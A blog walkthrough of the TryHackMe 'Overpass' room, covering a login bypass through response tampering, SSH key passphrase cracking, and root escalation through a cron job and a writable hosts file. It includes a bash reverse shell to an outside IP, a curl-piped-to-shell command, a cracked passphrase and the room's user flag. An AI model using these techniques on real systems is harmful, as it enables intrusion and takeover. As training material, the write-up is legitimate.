6.3 KiB
Executable File
| layout | title | date | categories | tags | math | libraries | math | description | |||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| post | TryHackMe - Overpass | 2023-12-23 10:29:32 +0800 |
|
|
true |
|
true | Overpass Room in TryHackMe |
Description
What happens when a group of broke Computer Science students try to make a password manager?
Obviously a perfect commercial success!
Enumeration
Nmap Scan
nmap -p- -T5 $IP
Nmap scan report for 10.10.88.227
Host is up (0.19s latency).
Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Dirbuster Scan
{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}}
Looks like there is a route to http://10.10.88.227/admin.html.
Inspecting the sources (login.js), we can see the vulnerable code block:
{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the else block" alt="" width="700px" position="center" >}}
The if-else blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a SessionToken cookie (or manually create 1 ourselves).
Burpsuite Intercept
{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}}
Intercepting the traffic, we can get the Response to this request in the ui:
{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}}
Forwarding the traffic, we can see the modified response
{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}}
We can then try to refresh the page in Burpsuite's Browser and find that we are logged in!
{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}}
We can see that a SessionToken cookie is created in the browser
{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}}
Looks like an SSH RSA Private Key. We might be able to use this to access the server?
SSH
Trying this:
ssh -i james@$IP
I get the following response:
{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}}
Cracking the SSH key passphrase
I first used ssh2john to convert it to a key hash:
ssh2john james.key > james.key.hash
Removing the rsa.key: from the hash, and using hashcat to identify the id of the hash to crack:
{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}}
I then use hashcat to crack the hash with the rockyou wordlist:
hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt
{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}}
Passphrase: james13
Login attempt
Using the same command, I tried to SSH into the machine with the key and passphrase:
{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}}
We got the user flag:
thm{65c1aaf000506e56996822c6281e6bf7}
Privilege Escalation
Using Linpeas, we can find possible routes to privilige escalation. Following this tutorial, I started a webserver in the host machine and curl-ed the script in the victim machine:
curl $HOST-IP/linpeas.sh | sh
Crontab
{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}}
Looks like the final line in the crontab runs as root, getting a bash script from a particular server and executing it
Hosts File
{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}}
The hosts file seems to be writable by everyone. Looks like I could modify the overpass.thm in the hosts file to do a callback to the host machine to run a malicious callback script.
Escalation Process
We first created the necessary directories and buildscript.sh file:
mkdir downloads
mkdir downloads/src
vim downloads/src/buildscript.sh
# Create the file with this as content:
# bash -i >& /dev/tcp/HOST-IP/5555 0>&1
# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
# Just in case (Probably don't have to do this)
chmod +x downloads/src/buildscript.sh
and also started 2 servers:
# Start the netcat listener
nc -lvnup 5555
# Python Http Server
# sudo python3 -m http.server 80
# Python2 Http Server
python2 -m SimpleHTTPServer 80
It doesn't seem like the Python3 server works, so I used python2 with SimpleHTTPServer instead.. (More info later)
The script used was a bash reverse shell, folloing the tutorial here, I created the file with this as the content:
#!/bin/bash
bash -i >& /dev/tcp/10.17.101.177/5555 0>&1
In the Victim Machine, I modified the hosts file
10.17.101.177 overpass.thm
{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}}
And then we wait.. The script will be executed after the request from crontab.
{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}}
After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory:
{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}}
We can see that we are root, the root.txt flag is in the directory and we can get the root flag!